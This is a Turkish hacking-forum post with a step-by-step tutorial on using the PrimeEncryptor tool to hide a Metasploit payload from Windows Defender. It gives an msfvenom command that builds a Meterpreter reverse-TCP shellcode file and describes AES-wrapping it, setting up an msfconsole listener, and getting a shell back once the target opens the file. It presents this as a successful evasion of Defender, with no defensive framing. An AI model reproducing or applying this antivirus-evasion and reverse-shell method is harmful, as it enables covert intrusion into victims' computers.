Hoşgeldin Misafir

PrimeEncryptor İle Windows Defender Bypass

xS0N3R

23 Ağu 2020
5,424 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba, bugün sizlere PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.

Öncelikle aracı sanal makinemize kuralım

eeck93s.png


Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.


6pcyskd.png


Daha sonra bir arka kapı dosyası oluşturuyoruz. Bunun için msfvenom kullanıyoruz.

komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST>LPORT=4444 -f raw > payload.bin

7sm7pf7.png





nq0is5l.png


AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.

İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.


ef2upgd.png


ilk bölüm (bölümü sil)

29x0fjr.png


yorumdan yorum kısmını kaldır

Daha sonra Kaydedip Çıkın.

Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştırırız.

a3umj1b.png



f3obt6l.png


Yükümüz oluşturuldu ve ls -l komutunu çalıştırarak bunu görebiliriz.

9yo527k.png


ip ve portu dinlemek, yazmak için msfconsol kullanıyoruz.

9l2qhz8.png



Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.

9b2jmor.png


Windows Defender tehdit hakkında herhangi bir uyarı vermedi. Bu şekilde Windows Defender'ı atlatmış olduk.

kbjlxqa.png